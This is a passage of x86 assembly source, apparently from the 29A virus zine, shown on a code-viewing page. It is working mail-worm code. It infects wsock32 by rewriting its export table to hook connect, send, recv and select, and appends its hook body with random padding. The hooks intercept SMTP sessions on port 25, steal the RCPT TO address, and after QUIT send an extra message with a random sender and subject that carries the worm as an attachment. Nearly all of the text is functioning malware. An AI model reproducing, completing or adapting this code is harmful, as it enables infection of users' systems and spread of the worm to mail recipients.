📄 29a-7.008
字号:
call patchAPI
jc near infwsErrorCloseUnmap
add eax,[esi+34h]
mov [_recv],eax
mov eax,~'sele'
not eax
call patchAPI
jc near infwsErrorCloseUnmap
add eax,[esi+34h]
mov [_select],eax
xor eax,eax
mov [esi+58h],eax
or dword [edi+24h],0c0000000h
mov eax,wsockHookSize
add eax,[attachmentSize]
push eax
add eax,[edi+10h]
mov ecx,[esi+3ch]
xor edx,edx
div ecx
inc eax
mul ecx
mov [edi+10h],eax
add eax,[edi+0ch]
mov ecx,[esi+38h]
xor edx,edx
div ecx
inc eax
mul ecx
mov [esi+50h],eax
sub eax,[edi+0ch]
mov [edi+08h],eax
pop eax
add eax,[fileSize]
push eax
repeatRndPadding:
push dword 200h
call rnd
or eax,eax
jz repeatRndPadding
add dword [esp],eax
pop dword [padding]
push dword [mapMem]
call UnmapViewOfFile
push dword [fhmap]
call CloseHandle
xor eax,eax
push eax
push dword [padding]
push eax
push dword 4
push eax
push dword [fHnd]
call CreateFileMappingA
or eax,eax
jz infwsErrorClose
mov [fhmap],eax
xor eax,eax
push dword [padding]
push eax
push eax
push dword 6
push dword [fhmap]
call MapViewOfFile
or eax,eax
jz infwsErrorCloseMap
mov [mapMem],eax
mov ecx,wsockHookSize
lea esi,[wsockHookBegin]
mov edi,eax
add edi,dword [fileSize]
rep movsb
mov ecx,[attachmentSize]
mov esi,[attachment]
rep movsb
mov byte [hkey],1
infwsErrorCloseUnmap:
push dword [mapMem]
call UnmapViewOfFile
infwsErrorCloseMap:
push dword [fhmap]
call CloseHandle
infwsErrorClose:
push dword [fHnd]
call CloseHandle
infwsError:
ret
; ECX: PE header EAX: rva shit
; out EAX: raw
rva2raw:
push eax
pushad
mov esi,eax
mov edx,ecx
mov eax,18h
add ax,[edx+14h]
add edx,eax
movzx ecx,word [ecx+06h]
xor ebp,ebp
rva2rawLoop:
mov edi,[edx+ebp+0ch]
add edi,[edx+ebp+8]
cmp esi,edi
jb foundDamnSect
nextSectPlz:
add ebp,28h
loop rva2rawLoop
popad
pop eax
stc
ret
foundDamnSect:
sub esi,[edx+ebp+0ch]
add esi,[edx+ebp+14h]
mov dword [esp+20h],esi
popad
pop eax
clc
ret
patchAPI:
push eax
pushad
mov edi,eax
mov ecx,esi
mov edx,[esi+78h]
or edx,edx
jz patchAPIError
add edx,[mapMem]
mov esi,[edx+20h]
or esi,esi
jz patchAPIError
mov eax,esi
call rva2raw
jc patchAPIError
mov esi,eax
add esi,[mapMem]
xor ebp,ebp
hookApiLoop:
mov eax,[esi+ebp*2]
call rva2raw
jc patchAPIError
add eax,[mapMem]
cmp [eax],edi
je APIFound
add ebp,2
jmp hookApiLoop
APIFound:
mov eax,[edx+24h]
call rva2raw
jc patchAPIError
add eax,[mapMem]
movzx ebp,word [eax+ebp]
mov eax,[edx+1ch]
call rva2raw
jc patchAPIError
add eax,[mapMem]
or ebx,ebx
jnz justPatch
mov ebx,[eax+ebp*4]
jmp saveOldAddr
justPatch:
xchg ebx,[eax+ebp*4]
saveOldAddr:
mov [esp+20h],ebx
popad
pop eax
clc
ret
patchAPIError:
popad
pop eax
stc
ret
; - wsock.inc EOF -
; - wsockhook.inc BOF -
RCPTTOLEN equ 128
wsockHookBegin:
my_connect:
pushad
call inithook
mov eax,~'FREE'
sem equ $-4
cmp eax,~'BUSY'
je _my_connect0
mov eax,dword [esp+28h]
mov ax,word [eax+2]
cmp ax,1900h
jne _my_connect0
_my_connect1:
mov eax,[esp+24h]
mov dword [listenSocket+ebp],eax
_my_connect0:
mov eax,[_connect+ebp]
xchg [esp+20h],eax
mov [_connect_caller+ebp],eax
popad
pop eax
call eax
sub esp,0ch
push dword 12345678h
_connect_caller equ $-4
retn 0ch
my_send:
pushad
call inithook
mov eax,[sem+ebp]
cmp eax,~'BUSY'
je _my_send0
mov eax,-1
listenSocket equ $-4
inc eax
jz _my_send0
dec eax
cmp eax,[esp+24h]
jne _my_send0
jmp _my_send1
_my_send0:
mov eax,[_send+ebp]
xchg [esp+20h],eax
mov [_send_caller+ebp],eax
popad
pop eax
call eax
sub esp,10h
push dword 12345678h
_send_caller equ $-4
retn 10h
_my_send1:
mov esi,[esp+28h]
mov edi,[esp+2ch]
cmp edi,6
jb _my_send0
mov eax,dword [esi]
and eax,~20202020h
cmp eax,'RCPT'
jne __my_send1_2
call my_send_get_rcpt
jmp _my_send0
__my_send1_2:
cmp eax,'QUIT'
jne _my_send0
cmp word [esi+4],0a0dh
jne _my_send0
mov dword [sem+ebp],~'BUSY'
cmp byte [rcptto+ebp],0
je __my_send1_3
call smtp
__my_send1_3:
xor eax,eax
dec eax
mov dword [listenSocket+ebp],eax
mov dword [sem+ebp],~'FREE'
jmp _my_send0
my_send_get_rcpt:
mov ecx,edi
add ecx,esi
lea edi,[rcptto+ebp]
mov byte [edi],0
my_send_get_rcpt1:
cmp byte [esi],':'
je my_send_get_rcpt0
inc esi
cmp esi,ecx
jb my_send_get_rcpt1
ret
my_send_get_rcpt0:
inc esi
mov ebx,RCPTTOLEN
add ebx,edi
my_send_get_rcpt3:
cmp esi,ecx
jnb my_send_get_rcpt4
cmp edi,ebx
jb my_send_get_rcpt2
my_send_get_rcpt4:
mov byte [rcptto+ebp],0
ret
my_send_get_rcpt2:
movsb
cmp byte [esi],0dh
jne my_send_get_rcpt3
movsb
mov ax,000ah
stosw
ret
inithook:
call _inithook0
_inithook0:
pop ebp
sub ebp,dword _inithook0
lea esi,[_wsockhookbase+ebp]
mov ecx,[esi]
jecxz _inithook1
lea eax,[my_connect+ebp]
sub eax,ecx
add [_connect+ebp],eax
add [_send+ebp],eax
add [_recv+ebp],eax
add [_select+ebp],eax
xor eax,eax
mov dword [esi],eax
mov [hseed+ebp],esp
_inithook1:
ret
smtp:
push ebp
mov ebp,esp
sub esp,512
push ebp
sub ebp,512
call @sendMail0
@sendMail0:
pop ebx
sub ebx,dword @sendMail0
mov ecx,8
mov eax,[hseed+ebx]
lea esi,[rndFrom+ebx]
fromRndLoop:
mov byte [esi],al
and byte [esi],0fh
add byte [esi],'a'
rol eax,3
add eax,[rcptto+ebx]
inc esi
loop fromRndLoop
add [hseed+ebx],eax
lea edi,[cmd0+ebx]
call rcchain
jc near @sendMailOut
push dword sizeCmd1
lea edi,[cmd1+ebx]
push edi
call __send
lea esi,[rcptto+ebx]
push esi
@sendMail1:
lodsb
or al,al
jnz @sendMail1
sub esi,[esp]
dec esi
xchg [esp],esi
push esi
call __send
mov byte [ebp],0
push dword 512
push ebp
call __recv
cmp byte [ebp],'2'
je @sendMail2
cmp byte [ebp],'3'
jne near @sendMailOut
@sendMail2:
lea edi,[cmd2+ebx]
call rcchain
jc near @sendMailOut
push dword body0Size
lea edi,[body0+ebx]
push edi
call __send
cmp byte [pflag+ebx],0
jne weHaveSubject
lea edi,[gsubject+ebx]
lea esi,[rndFrom+ebx]
mov ecx,8
mov [ssubj+ebx],ecx
rep movsb
jmp skipThisSubject
weHaveSubject:
push dword [ssubj+ebx]
lea edi,[gsubject+ebx]
push edi
call __send
skipThisSubject:
push dword body1Size
lea edi,[body1+ebx]
push edi
call __send
push dword [ssubj+ebx]
lea edi,[gsubject+ebx]
push edi
call __send
push dword body2Size
lea edi,[body2+ebx]
push edi
call __send
push dword [ssubj+ebx]
lea edi,[gsubject+ebx]
push edi
call __send
push dword body3Size
lea edi,[body3+ebx]
push edi
call __send
push dword [attachmentSize+ebx]
lea edi,[_attachment+ebx]
push edi
call __send
lea edi,[bodyEnd+ebx]
call rcchain
@sendMailOut:
pop ebp
leave
ret
rcchain:
push ebx
xor ebx,ebx
mov bl,byte [edi]
inc edi
push ebx
push edi
call __send
mov byte [ebp],0
push dword 512
push ebp
call __recv
cmp byte [ebp],'2'
je @rcchain1
cmp byte [ebp],'3'
je @rcchain1
stc
mov al,0f8h
@rcchain1 equ $-1
pop ebx
ret
__recv:
push edx
mov edx,esp
pushad
call inithook
push edx
lea esi,[fd_fdset+ebp]
mov dword [esi],1
mov eax,[listenSocket+ebp]
mov [esi+4],eax
xor eax,eax
push eax
push eax
push eax
push esi
push eax
call dword [_select+ebp]
pop edx
inc eax
jz __recv_out
push dword 0
push dword [edx+12]
push dword [edx+8]
push dword [listenSocket+ebp]
call dword [_recv+ebp]
__recv_out:
popad
pop edx
retn 8
__send:
push edx
mov edx,esp
pushad
call inithook
__send_retry:
push edx
lea esi,[fd_fdset+ebp]
mov dword [esi],1
mov eax,[listenSocket+ebp]
mov [esi+4],eax
xor eax,eax
push eax
push eax
push esi
push eax
push eax
call dword [_select+ebp]
pop edx
inc eax
jz __send_out
push edx
push dword 0
push dword [edx+12]
push dword [edx+8]
push dword [listenSocket+ebp]
call dword [_send+ebp]
pop edx
inc eax
jz __send_retry
dec eax
or eax,eax
jz __send_out
cmp eax,[edx+12]
je __send_out
add [edx+8],eax
sub [edx+12],eax
jmp __send_retry
__send_out:
popad
pop edx
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -